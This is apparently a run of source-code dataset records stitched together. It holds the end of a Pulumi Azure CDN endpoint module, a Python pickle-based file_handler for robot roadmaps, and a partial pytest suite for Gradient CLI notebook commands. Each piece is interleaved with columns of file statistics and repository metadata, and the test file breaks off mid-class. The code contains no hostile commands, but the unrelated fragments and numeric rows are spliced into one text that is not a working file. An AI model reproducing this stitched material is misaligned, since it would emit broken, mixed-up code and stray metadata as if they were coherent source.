* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `overwrite`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **origins** object supports the following:
* `host_name` (`pulumi.Input[str]`) - A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
* `httpPort` (`pulumi.Input[float]`) - The HTTP port of the origin. Defaults to `80`. Changing this forces a new resource to be created.
* `httpsPort` (`pulumi.Input[float]`) - The HTTPS port of the origin. Defaults to `443`. Changing this forces a new resource to be created.
* `name` (`pulumi.Input[str]`) - The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["content_types_to_compresses"] = content_types_to_compresses
__props__["delivery_rules"] = delivery_rules
__props__["geo_filters"] = geo_filters
__props__["global_delivery_rule"] = global_delivery_rule
__props__["host_name"] = host_name
__props__["is_compression_enabled"] = is_compression_enabled
__props__["is_http_allowed"] = is_http_allowed
__props__["is_https_allowed"] = is_https_allowed
__props__["location"] = location
__props__["name"] = name
__props__["optimization_type"] = optimization_type
__props__["origin_host_header"] = origin_host_header
__props__["origin_path"] = origin_path
__props__["origins"] = origins
__props__["probe_path"] = probe_path
__props__["profile_name"] = profile_name
__props__["querystring_caching_behaviour"] = querystring_caching_behaviour
__props__["resource_group_name"] = resource_group_name
__props__["tags"] = tags
return Endpoint(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 81.822443
| 489
| 0.662813
| 6,975
| 57,603
| 5.376057
| 0.056201
| 0.085365
| 0.050403
| 0.033442
| 0.949411
| 0.94629
| 0.941464
| 0.937357
| 0.918742
| 0.914849
| 0
| 0.002021
| 0.209798
| 57,603
| 703
| 490
| 81.938834
| 0.821785
| 0.596202
| 0
| 0.019802
| 1
| 0
| 0.161389
| 0.034729
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039604
| false
| 0.009901
| 0.059406
| 0.019802
| 0.326733
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
55c64e6db27fa0e0bc7b70d5cb7799119ea0b394
| 1,537
|
py
|
Python
|
roadmap_tools/scripts/file_handler.py
|
JKBehrens/STAAMS-Solver
|
b6837da69cda574d081ab3dc0b307e3ce40ad6f2
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 16
|
2018-12-11T13:02:58.000Z
|
2022-02-28T09:05:20.000Z
|
roadmap_tools/scripts/file_handler.py
|
stepakar/STAAMS-Solver
|
b6837da69cda574d081ab3dc0b307e3ce40ad6f2
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-11-04T13:16:49.000Z
|
2022-02-28T09:17:30.000Z
|
roadmap_tools/scripts/file_handler.py
|
stepakar/STAAMS-Solver
|
b6837da69cda574d081ab3dc0b307e3ce40ad6f2
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 4
|
2019-02-12T12:41:25.000Z
|
2022-02-09T12:55:56.000Z
|
#!/usr/bin/env python
"""
Copyright (c) 2018 Robert Bosch GmbH
All rights reserved.
This source code is licensed under the BSD-3-Clause license found in the
LICENSE file in the root directory of this source tree.
@author: Jan Behrens
"""
import cPickle as pickle
class file_handler:
def load_prm(self, file_name="prm"):
with open(file_name + '.pkl', 'rb') as in_file:
loaded_prm = pickle.load(in_file)
return loaded_prm
def save_clash(self, left, right, file_name="prm_clash"):
prm_clash = {"left_arm": left, "right_arm": right}
with open(file_name + '.pkl', 'wb') as output:
pickle.dump(prm_clash, output, pickle.HIGHEST_PROTOCOL)
def load_clash(self, file_name="prm_clash"):
with open(file_name + '.pkl', 'rb') as output:
loaded_clash = pickle.load(output)
return loaded_clash
class FileHandler:
def __init__(self):
pass
def load_prm(self, file_name="prm"):
with open(file_name + '.pkl', 'rb') as in_file:
loaded_prm = pickle.load(in_file)
return loaded_prm
def save_clash(self, left, right, file_name="prm_clash"):
prm_clash = {"left_arm": left, "right_arm": right}
with open(file_name + '.pkl', 'wb') as output:
pickle.dump(prm_clash, output, pickle.HIGHEST_PROTOCOL)
def load_clash(self, file_name="prm_clash"):
with open(file_name + '.pkl', 'rb') as output:
loaded_clash = pickle.load(output)
return loaded_clash
| 29.557692
| 72
| 0.644112
| 219
| 1,537
| 4.296804
| 0.292237
| 0.102019
| 0.070138
| 0.102019
| 0.735388
| 0.735388
| 0.735388
| 0.735388
| 0.735388
| 0.735388
| 0
| 0.004281
| 0.240078
| 1,537
| 51
| 73
| 30.137255
| 0.80137
| 0.149642
| 0
| 0.827586
| 0
| 0
| 0.08622
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.241379
| false
| 0.034483
| 0.034483
| 0
| 0.482759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3607edf4bc12efb91d3a35611fe4368b5d8a39a0
| 63,755
|
py
|
Python
|
tests/functional/test_notebooks.py
|
Exitussru/GradientCI
|
014d4e36d8456e805b78e75562b8235221b62b9e
|
[
"0BSD"
] | null | null | null |
tests/functional/test_notebooks.py
|
Exitussru/GradientCI
|
014d4e36d8456e805b78e75562b8235221b62b9e
|
[
"0BSD"
] | null | null | null |
tests/functional/test_notebooks.py
|
Exitussru/GradientCI
|
014d4e36d8456e805b78e75562b8235221b62b9e
|
[
"0BSD"
] | null | null | null |
import json
import mock
import pytest
from click.testing import CliRunner
from gradient.api_sdk import sdk_exceptions
from gradient.api_sdk.clients.http_client import default_headers
from gradient.cli import cli
from tests import MockResponse, example_responses
EXPECTED_HEADERS = default_headers.copy()
EXPECTED_HEADERS["ps_client_name"] = "gradient-cli"
EXPECTED_HEADERS_WITH_CHANGED_API_KEY = EXPECTED_HEADERS.copy()
EXPECTED_HEADERS_WITH_CHANGED_API_KEY["X-API-Key"] = "some_key"
@pytest.fixture
def basic_options_metrics_stream_websocket_connection_iterator():
def generator(self):
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"memoryUsage",
"pod_metrics":{"nrwed38p":{"time_stamp":1588066152,"value":"54013952"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"cpuPercentage",
"pod_metrics":{"nrwed38p":{"time_stamp":1588066152,"value":"0.006907773333334353"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"memoryUsage",
"pod_metrics":{"nrwed38p":{"time_stamp":1588066155,"value":"12345667"}}}"""
raise sdk_exceptions.GradientSdkError()
return generator
@pytest.fixture
def all_options_metrics_stream_websocket_connection_iterator():
def generator(self):
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"gpuMemoryFree",
"pod_metrics":{"nrwed38p":{"time_stamp":1588068626,"value":"1234"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"gpuMemoryUsed",
"pod_metrics":{"nrwed38p":{"time_stamp":1588068646,"value":"32"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"gpuMemoryFree",
"pod_metrics":{"nrwed38p":{"time_stamp":1588068646,"value":"2345"}}}"""
raise sdk_exceptions.GradientSdkError()
return generator
class TestNotebooksCreate(object):
URL = "https://api.paperspace.io/notebooks/v2/createNotebook"
COMMAND = [
"notebooks",
"create",
"--machineType", "P5000",
"--container", "jupyter/notebook",
"--clusterId", "321"
]
EXPECTED_REQUEST_JSON = {
"vmTypeLabel": "P5000",
"containerName": "jupyter/notebook",
"clusterId": "321",
'isPreemptible': False,
'isPublic': False,
}
EXPECTED_RESPONSE_JSON = {
"handle": "some_id",
"notebookToken": None,
"jobId": 20163,
"isPublic": False,
"id": 1811,
"containerName": "jupyter/notebook",
}
EXPECTED_STDOUT = "Created new notebook with id: some_id\n" \
"https://www.paperspace.com/some_namespace/notebook/prg284tu2\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"create",
"--machineType", "P5000",
"--container", "jupyter/notebook",
"--clusterId", "321",
"--apiKey", "some_key",
]
COMMAND_WITH_ALL_OPTIONS = [
"notebooks",
"create",
"--machineType", "P5000",
"--container", "jupyter/notebook",
"--clusterId", "321",
"--name", "some_notebook_name",
"--registryUsername", "some_username",
"--registryPassword", "some_password",
"--command", "some_entrypoint",
"--containerUser", "some_container_user",
"--shutdownTimeout", "8",
"--isPreemptible",
]
EXPECTED_REQUEST_JSON_WITH_ALL_OPTIONS = {
"vmTypeLabel": "P5000",
"containerName": "jupyter/notebook",
"clusterId": "321",
"name": "some_notebook_name",
"registryUsername": "some_username",
"registryPassword": "some_password",
"defaultEntrypoint": "c29tZV9lbnRyeXBvaW50",
"containerUser": "some_container_user",
"shutdownTimeout": 8,
"isPreemptible": True,
"isPublic": False,
}
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "create", "--optionsFile", ] # path added in test
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to create resource: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id_when_all_options_were_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_ALL_OPTIONS)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON_WITH_ALL_OPTIONS,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_read_option_from_yaml_file(self, post_patched, get_patched, notebooks_create_config_path):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_create_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON_WITH_ALL_OPTIONS,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to create resource\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
# TODO: Add test case for creating notebook with tag
class TestNotebooksFork(object):
URL = "https://api.paperspace.io/notebooks/v2/forkNotebook"
COMMAND = [
"notebooks",
"fork",
"--id", "n1234",
]
EXPECTED_REQUEST_JSON = {
"notebookId": "n1234",
}
EXPECTED_RESPONSE_JSON = {
"handle": "n1234",
"notebookToken": None,
"jobId": 20163,
"isPublic": False,
"id": 1811,
}
EXPECTED_STDOUT = "Notebook forked to id: n1234\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"fork",
"--id", "n1234",
"--apiKey", "some_key",
]
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to fork notebook: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to fork notebook\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestNotebooksStart(object):
URL = "https://api.paperspace.io/notebooks/v2/startNotebook"
COMMAND = [
"notebooks",
"start",
"--id", "n123",
"--machineType", "c5.xlarge",
"--clusterId", "cl123",
]
EXPECTED_REQUEST_JSON = {
"notebookId": "n123",
"vmTypeLabel": "c5.xlarge",
"clusterId": "cl123",
"isPreemptible": False,
}
EXPECTED_RESPONSE_JSON = {
"handle": "n123",
"notebookToken": None,
"jobId": 20163,
"isPublic": False,
"id": 1811,
"containerId": 123,
}
EXPECTED_STDOUT = "Started notebook with id: n123\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"start",
"--id", "n123",
"--machineType", "c5.xlarge",
"--clusterId", "cl123",
"--apiKey", "some_key",
]
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to create resource: Invalid API token\n"
EXPECTED_STDOUT_WITH_KEY = "Started notebook with id: n123\n" \
"https://www.paperspace.com/some_namespace/notebook/prg284tu2\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT_WITH_KEY, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to create resource\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestNotebooksStop(object):
URL = "https://api.paperspace.io/notebooks/v2/stopNotebook"
COMMAND = [
"notebooks",
"stop",
"--id", "n123",
]
EXPECTED_REQUEST_JSON = {
"notebookId": 'n123',
}
EXPECTED_STDOUT = "Stopping notebook with id: n123\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"stop",
"--id", "n123",
"--apiKey", "some_key",
]
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Unable to stop instance: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched):
post_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Unable to stop instance\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestListNotebookArtifacts(object):
runner = CliRunner()
URL = "https://api.paperspace.io/notebooks/artifactsList"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_valid_get_request_with_all_parameters_for_a_list_of_artifacts(self, get_patched):
get_patched.return_value = MockResponse()
notebook_id = "some_notebook_id"
result = self.runner.invoke(cli.cli,
["notebooks", "artifacts", "list", "--id", notebook_id, "--apiKey", "some_key", "--size",
"--links",
"--files", "foo"])
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params={"notebookId": notebook_id,
"size": True,
"links": True,
"files": "foo"})
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@pytest.mark.parametrize('option,param', [("--size", "size"),
("-s", "size"),
("--links", "links"),
("-l", "links")])
def test_should_send_valid_get_request_with_valid_param_for_a_list_of_artifacts_for_both_formats_of_param(self,
get_patched,
option,
param):
get_patched.return_value = MockResponse(status_code=200)
notebook_id = "some_notebook_id"
result = self.runner.invoke(cli.cli,
["notebooks", "artifacts", "list", "--id", notebook_id, "--apiKey", "some_key"] + [option])
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params={"notebookId": notebook_id,
param: True})
assert result.exit_code == 0
class TestNotebooksDelete(object):
URL = "https://api.paperspace.io/notebooks/v2/deleteNotebook"
COMMAND = [
"notebooks",
"delete",
"--id", "some_id",
]
EXPECTED_REQUEST_JSON = {"notebookId": "some_id"}
EXPECTED_STDOUT = "Notebook deleted\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"delete",
"--id", "some_id",
"--apiKey", "some_key",
]
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "delete", "--optionsFile", ] # path added in test
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to delete resource: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched):
post_patched.return_value = MockResponse(status_code=204)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched):
post_patched.return_value = MockResponse(status_code=204)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_read_option_from_yaml_file(self, post_patched, notebooks_delete_config_path):
post_patched.return_value = MockResponse(status_code=204)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_delete_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, get_patched):
get_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to delete resource\n", result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestNotebooksdetails(object):
URL = "https://api.paperspace.io/notebooks/getNotebook"
COMMAND = ["notebooks", "details", "--id", "some_id"]
EXPECTED_STDOUT = """+---------+-----------------------------------+
| Name | some_name |
+---------+-----------------------------------+
| ID | ngw7piq9 |
| VM Type | K80 |
| State | Running |
| FQDN | ngw7piq9.dgradient.paperspace.com |
| Tags | |
+---------+-----------------------------------+
"""
EXPECTED_STDOUT_WITH_TAGS = """+---------+-----------------------------------+
| Name | some_name |
+---------+-----------------------------------+
| ID | ngw7piq9 |
| VM Type | K80 |
| State | Running |
| FQDN | ngw7piq9.dgradient.paperspace.com |
| Tags | tag1, tag2 |
+---------+-----------------------------------+
"""
RESPONSE_JSON = example_responses.NOTEBOOK_GET_RESPONSE
RESPONSE_JSON_WITH_TAGS = example_responses.NOTEBOOK_GET_RESPONSE_WITH_TAGS
COMMAND_WITH_API_KEY_USED = ["notebooks", "details", "--id", "some_id", "--apiKey", "some_key"]
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "details", "--optionsFile", ] # path added in test
